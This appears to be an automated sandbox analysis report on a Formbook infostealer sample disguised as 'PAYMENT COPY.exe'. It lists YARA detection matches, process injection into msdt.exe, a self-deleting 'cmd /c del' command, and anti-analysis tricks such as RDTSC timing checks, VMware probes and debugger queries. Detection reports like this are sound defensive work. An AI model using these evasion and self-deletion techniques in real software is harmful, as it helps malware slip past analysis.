          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@12/8
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Local\Temp\nsw3A72.tmpJump to behavior
          Source: PAYMENT COPY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PAYMENT COPY.exeVirustotal: Detection: 32%
          Source: PAYMENT COPY.exeReversingLabs: Detection: 27%
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile read: C:\Users\user\Desktop\PAYMENT COPY.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000003.335333892.000000001F140000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, msdt.exe
          Source: Binary string: msdt.pdb source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeUnpacked PE file: 2.2.PAYMENT COPY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: ek0j.dll.1.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041CA81 push es; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041C656 push ss; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00415EF0 push ss; iretd
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041CFFA push BB2529E0h; iretd
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B2D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041CA81 push es; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B41B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AECA81 push es; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB41B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB412 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB47C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE5EF0 push ss; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEC656 push ss; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AECFFA push BB2529E0h; iretd
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dllJump to dropped file
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000AD85F4 second address: 0000000000AD85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000AD898E second address: 0000000000AD8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6204Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.360549025.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.361717785.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.366638301.000000000D462000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.362236089.0000000008540000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.352285972.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.360549025.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.352285972.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.360457599.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.360457599.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.361717785.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_026417F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_026415D8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
